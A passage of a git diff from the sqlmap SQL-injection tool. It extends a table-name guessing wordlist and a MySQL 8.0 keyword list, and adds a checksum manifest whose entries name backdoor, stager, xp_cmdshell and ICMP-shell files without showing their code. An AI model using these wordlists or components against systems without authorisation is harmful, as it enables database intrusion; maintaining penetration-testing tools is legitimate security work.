+tbl_Takvim +tbl_blog +tbl_Sliders +tbl_Renk +tbl_UyeXML +tbl_tedarikci +tbl_Fotogaleri +tbl_Doviz +tbl_Anket +tbl_Banka +tbl_Metin +tbl_XML +tbl_firma +tbl_harita +tbl_banner +tbl_sepet +tbl_fotogaleri +tbl_marka +tbl_Siparis +tbl_personel +tbl_puan +tbl_Bulten +tbl_favori +tbl_onlineusers + + # List provided by Pedrito Perez (0ark1ang3l@gmail.com) @@ -3578,3 +3753,11 @@ users user_usergroup_map viewlevels weblinks + +# site:nl + +gebruikers + +# site:cn + +yonghu diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt index d9e2f543aa7..b280115150e 100644 --- a/data/txt/keywords.txt +++ b/data/txt/keywords.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) @@ -452,6 +452,762 @@ WRITEXOR YEAR_MONTH ZEROFILL +# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html) + +ACCESSIBLE +ACCOUNT +ACTION +ACTIVE +ADD +ADMIN +AFTER +AGAINST +AGGREGATE +ALGORITHM +ALL +ALTER +ALWAYS +ANALYSE +ANALYZE +AND +ANY +ARRAY +AS +ASC +ASCII +ASENSITIVE +AT +ATTRIBUTE +AUTHENTICATION +AUTOEXTEND_SIZE +AUTO_INCREMENT +AVG +AVG_ROW_LENGTH +BACKUP +BEFORE +BEGIN +BETWEEN +BIGINT +BINARY +BINLOG +BIT +BLOB +BLOCK +BOOL +BOOLEAN +BOTH +BTREE +BUCKETS +BULK +BY +BYTE +CACHE +CALL +CASCADE +CASCADED +CASE +CATALOG_NAME +CHAIN +CHALLENGE_RESPONSE +CHANGE +CHANGED +CHANNEL +CHAR +CHARACTER +CHARSET +CHECK +CHECKSUM +CIPHER +CLASS_ORIGIN +CLIENT +CLONE +CLOSE +COALESCE +CODE +COLLATE +COLLATION +COLUMN +COLUMNS +COLUMN_FORMAT +COLUMN_NAME +COMMENT +COMMIT +COMMITTED +COMPACT +COMPLETION +COMPONENT +COMPRESSED +COMPRESSION +CONCURRENT +CONDITION +CONNECTION +CONSISTENT +CONSTRAINT +CONSTRAINT_CATALOG +CONSTRAINT_NAME +CONSTRAINT_SCHEMA +CONTAINS +CONTEXT +CONTINUE +CONVERT +CPU +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_DATE +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +CURSOR_NAME +DATA +DATABASE +DATABASES +DATAFILE +DATE +DATETIME +DAY +DAY_HOUR +DAY_MICROSECOND +DAY_MINUTE +DAY_SECOND +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFAULT_AUTH +DEFINER +DEFINITION +DELAYED +DELAY_KEY_WRITE +DELETE +DENSE_RANK +DESC +DESCRIBE +DESCRIPTION +DES_KEY_FILE +DETERMINISTIC +DIAGNOSTICS +DIRECTORY +DISABLE +DISCARD +DISK +DISTINCT +DISTINCTROW +DIV +DO +DOUBLE +DROP +DUAL +DUMPFILE +DUPLICATE +DYNAMIC +EACH +ELSE +ELSEIF +EMPTY +ENABLE +ENCLOSED +ENCRYPTION +END +ENDS +ENFORCED +ENGINE +ENGINES +ENGINE_ATTRIBUTE +ENUM +ERROR +ERRORS +ESCAPE +ESCAPED +EVENT +EVENTS +EVERY +EXCEPT +EXCHANGE +EXCLUDE +EXECUTE +EXISTS +EXIT +EXPANSION +EXPIRE +EXPLAIN +EXPORT +EXTENDED +EXTENT_SIZE +FACTOR +FAILED_LOGIN_ATTEMPTS +FALSE +FAST +FAULTS +FETCH +FIELDS +FILE +FILE_BLOCK_SIZE +FILTER +FINISH +FIRST +FIRST_VALUE +FIXED +FLOAT +FLOAT4 +FLOAT8 +FLUSH +FOLLOWING +FOLLOWS +FOR +FORCE +FOREIGN +FORMAT +FOUND +FROM +FULL +FULLTEXT +FUNCTION +GENERAL +GENERATE +GENERATED +GEOMCOLLECTION +GEOMETRY +GEOMETRYCOLLECTION +GET +GET_FORMAT +GET_MASTER_PUBLIC_KEY +GET_SOURCE_PUBLIC_KEY +GLOBAL +GRANT +GRANTS +GROUP +GROUPING +GROUPS +GROUP_REPLICATION +GTID_ONLY +HANDLER +HASH +HAVING +HELP +HIGH_PRIORITY +HISTOGRAM +HISTORY +HOST +HOSTS +HOUR +HOUR_MICROSECOND +HOUR_MINUTE +HOUR_SECOND +IDENTIFIED +IF +IGNORE +IGNORE_SERVER_IDS +IMPORT +IN +INACTIVE +INDEX +INDEXES +INFILE +INITIAL +INITIAL_SIZE +INITIATE +INNER +INOUT +INSENSITIVE +INSERT +INSERT_METHOD +INSTALL +INSTANCE +INT +INT1 +INT2 +INT3 +INT4 +INT8 +INTEGER +INTERSECT +INTERVAL +INTO +INVISIBLE +INVOKER +IO +IO_AFTER_GTIDS +IO_BEFORE_GTIDS +IO_THREAD +IPC +IS +ISOLATION +ISSUER +ITERATE +JOIN +JSON +JSON_TABLE +JSON_VALUE +KEY +KEYRING +KEYS +KEY_BLOCK_SIZE +KILL +LAG +LANGUAGE +LAST +LAST_VALUE +LATERAL +LEAD +LEADING +LEAVE +LEAVES +LEFT +LESS +LEVEL +LIKE +LIMIT +LINEAR +LINES +LINESTRING +LIST +LOAD +LOCAL +LOCALTIME +LOCALTIMESTAMP +LOCK +LOCKED +LOCKS +LOGFILE +LOGS +LONG +LONGBLOB +LONGTEXT +LOOP +LOW_PRIORITY +MASTER +MASTER_AUTO_POSITION +MASTER_BIND +MASTER_COMPRESSION_ALGORITHMS +MASTER_CONNECT_RETRY +MASTER_DELAY +MASTER_HEARTBEAT_PERIOD +MASTER_HOST +MASTER_LOG_FILE +MASTER_LOG_POS +MASTER_PASSWORD +MASTER_PORT +MASTER_PUBLIC_KEY_PATH +MASTER_RETRY_COUNT +MASTER_SERVER_ID +MASTER_SSL +MASTER_SSL_CA +MASTER_SSL_CAPATH +MASTER_SSL_CERT +MASTER_SSL_CIPHER +MASTER_SSL_CRL +MASTER_SSL_CRLPATH +MASTER_SSL_KEY +MASTER_SSL_VERIFY_SERVER_CERT +MASTER_TLS_CIPHERSUITES +MASTER_TLS_VERSION +MASTER_USER +MASTER_ZSTD_COMPRESSION_LEVEL +MATCH +MAXVALUE +MAX_CONNECTIONS_PER_HOUR +MAX_QUERIES_PER_HOUR +MAX_ROWS +MAX_SIZE +MAX_UPDATES_PER_HOUR +MAX_USER_CONNECTIONS +MEDIUM +MEDIUMBLOB +MEDIUMINT +MEDIUMTEXT +MEMBER +MEMORY +MERGE +MESSAGE_TEXT +MICROSECOND +MIDDLEINT +MIGRATE +MINUTE +MINUTE_MICROSECOND +MINUTE_SECOND +MIN_ROWS +MOD +MODE +MODIFIES +MODIFY +MONTH +MULTILINESTRING +MULTIPOINT +MULTIPOLYGON +MUTEX +MYSQL_ERRNO +NAME +NAMES +NATIONAL +NATURAL +NCHAR +NDB +NDBCLUSTER +NESTED +NETWORK_NAMESPACE +NEVER +NEW +NEXT +NO +NODEGROUP +NONE +NOT +NOWAIT +NO_WAIT +NO_WRITE_TO_BINLOG +NTH_VALUE +NTILE +NULL +NULLS +NUMBER +NUMERIC +NVARCHAR +OF +OFF +OFFSET +OJ +OLD +ON +ONE +ONLY +OPEN +OPTIMIZE +OPTIMIZER_COSTS +OPTION +OPTIONAL +OPTIONALLY +OPTIONS +OR +ORDER +ORDINALITY +ORGANIZATION +OTHERS +OUT +OUTER +OUTFILE +OVER +OWNER +PACK_KEYS +PAGE +PARSER +PARTIAL +PARTITION +PARTITIONING +PARTITIONS +PASSWORD_LOCK_TIME +PATH +PERCENT_RANK +PERSIST +PERSIST_ONLY +PHASE +PLUGIN +PLUGINS +PLUGIN_DIR +POINT +POLYGON +PORT +PRECEDES +PRECEDING +PRECISION +PREPARE +PRESERVE +PREV +PRIMARY +PRIVILEGES +PRIVILEGE_CHECKS_USER +PROCEDURE +PROCESS +PROCESSLIST +PROFILE +PROFILES +PROXY +PURGE +QUARTER +QUERY +QUICK +RANDOM +RANGE +RANK +READ +READS +READ_ONLY +READ_WRITE +REAL +REBUILD +RECOVER +RECURSIVE +REDOFILE +REDO_BUFFER_SIZE +REDUNDANT +REFERENCE +REFERENCES +REGEXP +REGISTRATION +RELAY +RELAYLOG +RELAY_LOG_FILE +RELAY_LOG_POS +RELAY_THREAD +RELEASE +RELOAD +REMOTE +REMOVE +RENAME +REORGANIZE +REPAIR +REPEAT +REPEATABLE +REPLACE +REPLICA +REPLICAS +REPLICATE_DO_DB +REPLICATE_DO_TABLE +REPLICATE_IGNORE_DB +REPLICATE_IGNORE_TABLE +REPLICATE_REWRITE_DB +REPLICATE_WILD_DO_TABLE +REPLICATE_WILD_IGNORE_TABLE +REPLICATION +REQUIRE +REQUIRE_ROW_FORMAT +RESET +RESIGNAL +RESOURCE +RESPECT +RESTART +RESTORE +RESTRICT +RESUME +RETAIN +RETURN +RETURNED_SQLSTATE +RETURNING +RETURNS +REUSE +REVERSE +REVOKE +RIGHT +RLIKE +ROLE +ROLLBACK +ROLLUP +ROTATE +ROUTINE +ROW +ROWS +ROW_COUNT +ROW_FORMAT +ROW_NUMBER +RTREE +SAVEPOINT +SCHEDULE +SCHEMA +SCHEMAS +SCHEMA_NAME +SECOND +SECONDARY +SECONDARY_ENGINE +SECONDARY_ENGINE_ATTRIBUTE +SECONDARY_LOAD +SECONDARY_UNLOAD +SECOND_MICROSECOND +SECURITY +SELECT +SENSITIVE +SEPARATOR +SERIAL +SERIALIZABLE +SERVER +SESSION +SET +SHARE +SHOW +SHUTDOWN +SIGNAL +SIGNED +SIMPLE +SKIP +SLAVE +SLOW +SMALLINT +SNAPSHOT +SOCKET +SOME +SONAME +SOUNDS +SOURCE +SOURCE_AUTO_POSITION +SOURCE_BIND +SOURCE_COMPRESSION_ALGORITHMS +SOURCE_CONNECT_RETRY +SOURCE_DELAY +SOURCE_HEARTBEAT_PERIOD +SOURCE_HOST +SOURCE_LOG_FILE +SOURCE_LOG_POS +SOURCE_PASSWORD +SOURCE_PORT +SOURCE_PUBLIC_KEY_PATH +SOURCE_RETRY_COUNT +SOURCE_SSL +SOURCE_SSL_CA +SOURCE_SSL_CAPATH +SOURCE_SSL_CERT +SOURCE_SSL_CIPHER +SOURCE_SSL_CRL +SOURCE_SSL_CRLPATH +SOURCE_SSL_KEY +SOURCE_SSL_VERIFY_SERVER_CERT +SOURCE_TLS_CIPHERSUITES +SOURCE_TLS_VERSION +SOURCE_USER +SOURCE_ZSTD_COMPRESSION_LEVEL +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQL_AFTER_GTIDS +SQL_AFTER_MTS_GAPS +SQL_BEFORE_GTIDS +SQL_BIG_RESULT +SQL_BUFFER_RESULT +SQL_CACHE +SQL_CALC_FOUND_ROWS +SQL_NO_CACHE +SQL_SMALL_RESULT +SQL_THREAD +SQL_TSI_DAY +SQL_TSI_HOUR +SQL_TSI_MINUTE +SQL_TSI_MONTH +SQL_TSI_QUARTER +SQL_TSI_SECOND +SQL_TSI_WEEK +SQL_TSI_YEAR +SRID +SSL +STACKED +START +STARTING +STARTS +STATS_AUTO_RECALC +STATS_PERSISTENT +STATS_SAMPLE_PAGES +STATUS +STOP +STORAGE +STORED +STRAIGHT_JOIN +STREAM +STRING +SUBCLASS_ORIGIN +SUBJECT +SUBPARTITION +SUBPARTITIONS +SUPER +SUSPEND +SWAPS +SWITCHES +SYSTEM +TABLE +TABLES +TABLESPACE +TABLE_CHECKSUM +TABLE_NAME +TEMPORARY +TEMPTABLE +TERMINATED +TEXT +THAN +THEN +THREAD_PRIORITY +TIES +TIME +TIMESTAMP +TIMESTAMPADD +TIMESTAMPDIFF +TINYBLOB +TINYINT +TINYTEXT +TLS +TO +TRAILING +TRANSACTION +TRIGGER +TRIGGERS +TRUE +TRUNCATE +TYPE +TYPES +UNBOUNDED +UNCOMMITTED +UNDEFINED +UNDO +UNDOFILE +UNDO_BUFFER_SIZE +UNICODE +UNINSTALL +UNION +UNIQUE +UNKNOWN +UNLOCK +UNREGISTER +UNSIGNED +UNTIL +UPDATE +UPGRADE +URL +USAGE +USE +USER +USER_RESOURCES +USE_FRM +USING +UTC_DATE +UTC_TIME +UTC_TIMESTAMP +VALIDATION +VALUE +VALUES +VARBINARY +VARCHAR +VARCHARACTER +VARIABLES +VARYING +VCPU +VIEW +VIRTUAL +VISIBLE +WAIT +WARNINGS +WEEK +WEIGHT_STRING +WHEN +WHERE +WHILE +WINDOW +WITH +WITHOUT +WORK +WRAPPER +WRITE +X509 +XA +XID +XML +XOR +YEAR +YEAR_MONTH +ZEROFILL +ZONE + # PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html) ABS @@ -872,3 +1628,8 @@ XMLTABLE XMLTEXT XMLVALIDATE YEAR + +# Misc + +ORD +MID diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt new file mode 100644 index 00000000000..5fa53a29f92 --- /dev/null +++ b/data/txt/sha256sums.txt @@ -0,0 +1,630 @@ +39a8a35d730f49daf657fa58903a9cd309813b275df29a86439297a10a15261a data/html/index.html +e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18 data/procs/mssqlserver/activate_sp_oacreate.sql +6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120 data/procs/mssqlserver/configure_openrowset.sql +798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad data/procs/mssqlserver/configure_xp_cmdshell.sql +5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421 data/procs/mssqlserver/create_new_xp_cmdshell.sql +3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0 data/procs/mssqlserver/disable_xp_cmdshell_2000.sql +afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4 data/procs/mssqlserver/dns_request.sql +657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2 data/procs/mssqlserver/enable_xp_cmdshell_2000.sql +1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d data/procs/mssqlserver/run_statement_as_user.sql +9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf data/procs/mysql/dns_request.sql +02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb data/procs/mysql/write_file_limit.sql +02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900 data/procs/oracle/dns_request.sql +606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117 data/procs/oracle/read_file_export_extension.sql +4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb data/procs/postgresql/dns_request.sql +7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137 data/procs/README.txt +3fa42f7428a91d94e792ad8d3cb76109cfe2632d918ae046e32be5a2b51ad3d8 data/shell/backdoors/backdoor.asp_ +7943c1d1e8c037f5466f90ed91cc88441beb0efab83ef5ae98473d2aee770b65 data/shell/backdoors/backdoor.aspx_ +9d9d0bdd4145df96058977a39be924f0facdba9efa7b585848101dafbcb7b02e data/shell/backdoors/backdoor.jsp_ +8a7a73a4c841e92ece79942e03a18df046f90ba43e6af6c4f8fbb77f437bce07 data/shell/backdoors/backdoor.php_ +a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64 data/shell/README.txt +67ce7eec132297594f7fd31f93f8d044df3d745c01c70c5afc320848eb4aa149 data/shell/stagers/stager.asp_ +099eb0f9ed71946eb55bd1d4afa1f1f7ef9f39cc41af4897f3d5139524bd2fc2 data/shell/stagers/stager.aspx_ +f2648a0cb4d5922d58b8aa6600f786b32324b9ac91e3a57e4ff212e901ffe151 data/shell/stagers/stager.jsp_ +84b431647a2c13e72b2c9c9242a578349d1b8eef596166128e08f1056d7e4ac8 data/shell/stagers/stager.php_ +26e2a6d6154cbcef1410a6826169463129380f70a840f848dce4236b686efb23 data/txt/common-columns.txt +22cda9937e1801f15370e7cb784797f06c9c86ad8a97db19e732ae76671c7f37 data/txt/common-files.txt +a166b1958937364968a25e4bc64074c1ac12358443e58b1bf2ac3d8d88b48a30 data/txt/common-outputs.txt +7953f5967da237115739ee0f0fe8b0ecec7cdac4830770acb8238e6570422a28 data/txt/common-tables.txt +b023d7207e5e96a27696ec7ea1d32f9de59f1a269fde7672a8509cb3f0909cd3 data/txt/keywords.txt +29a0a6a2c2d94e44899e867590bae865bdf97ba17484c649002d1d8faaf3e127 data/txt/smalldict.txt +df66c8fdb08cc0eee63b86505bc5b05bc4cad5d0bef6553d5c20346e7202dc2b data/txt/user-agents.txt +9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6 data/txt/wordlist.tx_ +849c61612bd0d773971254df2cc76cc18b3d2db4051a8f508643278a166df44e data/udf/mysql/linux/32/lib_mysqludf_sys.so_ +20b5a80b8044da1a0d5c5343c6cbc5b71947c5464e088af466a3fcd89c2881ef data/udf/mysql/linux/64/lib_mysqludf_sys.so_ +8e6ae0e3d67e47261df064aa1536f99e56d4f001cc7f800c3d93b091c3c73115 data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ +51d055d00863655e43e683377257953a19728a0ae9a3fe406768289474eb4104 data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ +9340f3d10dcca0d72e707f22cf1c4c6581b979c23d6f55a417ee41d9091bb9d1 data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ +dc1199c029dff238e971fd3250916eb48503daa259464c24f22cd2cd51f5ccd8 data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ +0b6a7e34fbbd27adaa8beda36ce20e93fd65b8e3ce93bf44703c514ebdd1cef0 data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ +922fb68413b05031e9237414cf50a04e0e43f0d1c7ef44cfb77305eea0b6f2fe data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ +029ffa3b30a4c6cb10f5271b72c2a6b8967cdab0d23c8e4b0e5e75e2a5c734f2 data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ +52f9a6375099cb9c37ca1b8596c2e89a75ed6b8a2493b486ef3cd0230eaa6591 data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ +436e0bf6961f4d25321a6fe97bfa73ab2926175d5b93e9c4b0dbcd38a926ca31 data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ +6817b485450aed7a634ece8c6c12007ab38e6954c8cbc7a530b101347e788cbc data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ +a2de5ca53411f38dadc1535a58d7416a3758a126feec6becb4e0e33c974825f3 data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ +17e2f86c94b4cffb8de37b10456142f5a1bf3d500345bf508f16c9a359fbf005 data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ +5ffdaac7d85ac18e5bbae2776522d391d92ca18b2862c3d1d03fa90effcfb918 data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ +5fae599c42bb650a2c0ba8111ca64d52bb82ac1ea0e982a3c0f59587d166eb5b data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ +ded0da0260fea0c91e02839d2e06e62741cc25ac5d74b351b0a26e0c0abcd8de data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ +81e9f38cb47753f5b9f472eddd227023c44f6b302b7c03eca65dd9836856de69 data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ +87b0d86661eaf8bf58664a3aa241cc33525cf3dc1043ed60a82cf123d8ae3873 data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ +925a7b8a3904906b8402e707ed510e9ac7598ee30a90f5464d14a3678998cb90 data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ +c55ac17eaf8f4353ac1abbecb3165ebfceeed438780f9c1d8eb863a6f40d64f4 data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ +aecdef1198ad2bdfdebc82ba001b6d6c2d08cc162271a37d0a55ae8e5a0e3aa0 data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ +f128717b9930c4fd919da004dacc50487923d56239a68a2566d33212acc09839 data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ +965355721e6d5ada50e3f0fe576f668ee62adae0810a34c8024fb40c5301443b data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ +adfb9f1841af68b03f7dfe68234236034cb09d6be28902eda7d66792b667b58a data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ +b0d30e633532c28f693fbb91a67274b3d347cbefa0dfae8d6dafa2b934d9be14 data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ +7acbfe3ddd2d0083fe5d6a9f614008b0659539a5401bdf99d9bcd3667901e4dc data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ +191dc3607fdb4bad4e4231fd0d63c5926aa4055df024a083ea0ec0bbec6e3258 data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ +a6717d5da8c4515f9b53bcd2343a4d496dbdcf92c5b05e210f62731e2fa89ce7 data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ +611e1f025b919a75ec9543720cac4b02669967dab46e671f0328e75314852951 data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ +b427b65cc8b585cd02361f5155ffab2fe52fd5943100382c6b86cd0f52f352d9 data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ +c444fd667a09927a22c92e855d206249e761c1fbd4f3630f7ee06265eb2576ee data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ +c6be099a5dee34f3a7570715428add2e7419f4e73a7ce9913d3fb76eea78d88e data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ +0a6d5fc399e9958477c8a71f63b7c7884567204253e0d2389a240d83ed83f241 data/udf/README.txt +4e268596da67fb0b6a10a7cefb38af5de13f67dab760cc0505f8f80484a0fe79 data/xml/banner/generic.xml +2adcdd08d2c11a5a23777b10c132164ed9e856f2a4eca2f75e5e9b6615d26a97 data/xml/banner/mssql.xml +14b18da611d4bfad50341df89f893edf47cd09c41c9662e036e817055eaa0cfb data/xml/banner/mysql.xml +6d1ab53eeac4fae6d03b67fb4ada71b915e1446a9c1cc4d82eafc032800a68fd data/xml/banner/oracle.xml +9f4ca1ff145cfbe3c3a903a21bf35f6b06ab8b484dad6b7c09e95262bf6bfa05 data/xml/banner/postgresql.xml +86da6e90d9ccf261568eda26a6455da226c19a42cc7cd211e379cab528ec621e data/xml/banner/server.xml +146887f28e3e19861516bca551e050ce81a1b8d6bb69fd342cc1f19a25849328 data/xml/banner/servlet-engine.xml +e87c062bdf05b27db6c1d7e0d41c25f269cbe66b1f9b8e2d9b3db0d567016c76 data/xml/banner/set-cookie.xml +a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea data/xml/banner/sharepoint.xml +e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18 data/xml/banner/x-aspnet-version.xml +75672f8faa8053af0df566a48700f2178075f67c593d916313fcff3474da6f82 data/xml/banner/x-powered-by.xml +1ac399c49ce3cb8c0812bb246e60c8a6718226efe89ccd1f027f49a18dbeb634 data/xml/boundaries.xml +20fd2f2ba35ade45f242bd3c6e92898ac90b4ee6a63dbb8740cad06f91a395e5 data/xml/errors.xml +cfa1f0557fb71be0631796a4848d17be536e38f94571cf6ef911454fbc6b30d1 data/xml/payloads/boolean_blind.xml +f2b711ea18f20239ba9902732631684b61106d4a4271669125a4cf41401b3eaf data/xml/payloads/error_based.xml +b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609 data/xml/payloads/inline_query.xml +0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689 data/xml/payloads/stacked_queries.xml +997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1 data/xml/payloads/time_blind.xml +40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089 data/xml/payloads/union_query.xml +95b7464b1a7b75e2b462d73c6cca455c13b301f50182a8b2cd6701cdcb80b43e data/xml/queries.xml +abb6261b1c531ad2ee3ada8184c76bcdc38732558d11a8e519f36fcc95325f7e doc/AUTHORS +2a0322f121cbda30336ab58382e9860fea8ab28ff4726f6f8abf143ce1657abe doc/CHANGELOG.md +2df1f15110f74ce4e52f0e7e4a605e6c7e08fbda243e444f9b60e26dfc5cf09d doc/THANKS.md +f939c6341e3ab16b0bb9d597e4b13856c7d922be27fd8dba3aa976b347771f16 doc/THIRD-PARTY.md +3a8d6530c3aa16938078ee5f0e25178e8ce92758d3bad5809f800aded24c9633 doc/translations/README-ar-AR.md +d739d4ced220b342316f5814216bdb1cb85609cd5ebb89e606478ac43301009e doc/translations/README-bg-BG.md +6882f232e5c02d9feb7d4447e0501e4e27be453134fb32119a228686b46492a5 doc/translations/README-ckb-KU.md +9bed1c72ffd6b25eaf0ff66ac9eefaa4efc2f5e168f51cf056b0daf3e92a3db2 doc/translations/README-de-DE.md +008c66ba4a521f7b6f05af2d28669133341a00ebc0a7b68ce0f30480581e998c doc/translations/README-es-MX.md +244cec6aee647e2447e70bbeaf848c7f95714c27e258ddbe7f68787b2be88fe9 doc/translations/README-fa-IR.md +8d31107d021f468ebbcaac7d59ad616e8d5db93a7c459039a11a6bfd2a921ce9 doc/translations/README-fr-FR.md +b9017db1f0167dda23780949b4d618baf877375dc14e08ebd6983331b945ed44 doc/translations/README-gr-GR.md +40cb977cb510b0b9b0996c6ada1bace10f28ff7c43eaab96402d7b9198320fd3 doc/translations/README-hr-HR.md +86b0f6357709e453a6380741cb05f39aa91217cf52da240d403ee8812cc4c95f doc/translations/README-id-ID.md +384bacdd547f87749ea7d73fcb01b25e4b3681d5bcf51ee1b37e9865979eb7c3 doc/translations/README-in-HI.md +21120d6671fe87c2d04e87de675f90f739a7cfe2b553db9b1b5ec31667817852 doc/translations/README-it-IT.md +0daaccf3ccb2d42ad4fbedf0c4059e8a100bb66d5f093c5912b9862bf152bbf6 doc/translations/README-ja-JP.md +81370d878567f411a80d2177d7862aa406229e6c862a6b48d922f64af0db8d14 doc/translations/README-ka-GE.md +8fb3c1b2ddb0efc9a7a1962027fa64c11c11b37eda24ea3dfca0854be73839d8 doc/translations/README-ko-KR.md +35bc7825417d83c21d19f7ebe288721c3960230a0f5b3d596be30b37e00e43c5 doc/translations/README-nl-NL.md +12d6078189d5b4bc255f41f1aae1941f1abe501abd2c0442b5a2090f1628e17d doc/translations/README-pl-PL.md +8d0708c2a215e2ee8367fe11a3af750a06bc792292cba8a204d44d03deb56b7d doc/translations/README-pt-BR.md +070cc897789e98f144a6b6b166d11289b3cda4d871273d2afe0ab81ac7ae90ad doc/translations/README-rs-RS.md +927743c0a1f68dc76969bda49b36a6146f756b907896078af2a99c3340d6cc34 doc/translations/README-ru-RU.md +65de5053b014b0e0b9ab5ab68fe545a7f9db9329fa0645a9973e457438b4fde5 doc/translations/README-sk-SK.md +43de61a9defc5eda42a6c3d746f422b43f486eacefb97862f637ab60650e9ef2 doc/translations/README-tr-TR.md +0db2d479b1512c948a78ce5c1cf87b5ce0b5b94e3cb16b19e9afcbed2c7f5cae doc/translations/README-uk-UA.md +82f9ec2cf2392163e694c99efa79c459a44b6213a5881887777db8228ea230fa doc/translations/README-vi-VN.md +0e8f0a2186f90fabd721072972c571a7e5664496d88d6db8aedcb1d0e34c91f0 doc/translations/README-zh-CN.md +788b845289c2fbbfc0549a2a94983f2a2468df15be5c8b5de84241a32758d70b extra/beep/beep.py +509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9 extra/beep/beep.wav +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/beep/__init__.py +cbfa457aa0fb379a0bf90bc7e50c31aa4491043732233260d66fa0103c507d23 extra/cloak/cloak.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/cloak/__init__.py +6879b01859b2003fbab79c5188fce298264cd00300f9dcecbe1ffd980fe2e128 extra/cloak/README.txt +54b1ad04bf475393edf44cdcd247f0bd61115a3a6c3e55eb01d2950c49f46e61 extra/dbgtool/dbgtool.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/dbgtool/__init__.py +a777193f683475c63f0dd3916f86c4b473459640c3278ff921432836bc75c47f extra/dbgtool/README.txt +a87035e5923f5b56077dfbd18cda5aa5e2542f0707b7b55f7bbeb1960ae3cc9a extra/icmpsh/icmpsh.exe_ +2fcce0028d9dd0acfaec497599d6445832abad8e397e727967c31c834d04d598 extra/icmpsh/icmpsh-m.c +8c38efaaf8974f9d08d9a743a7403eb6ae0a57b536e0d21ccb022f2c55a16016 extra/icmpsh/icmpsh-m.pl +12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733 extra/icmpsh/icmpsh_m.py +1589e5edeaf80590d4d0ce1fd12aa176730d5eba3bfd72a9f28d3a1a9353a9db extra/icmpsh/icmpsh-s.c +ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40 extra/icmpsh/__init__.py 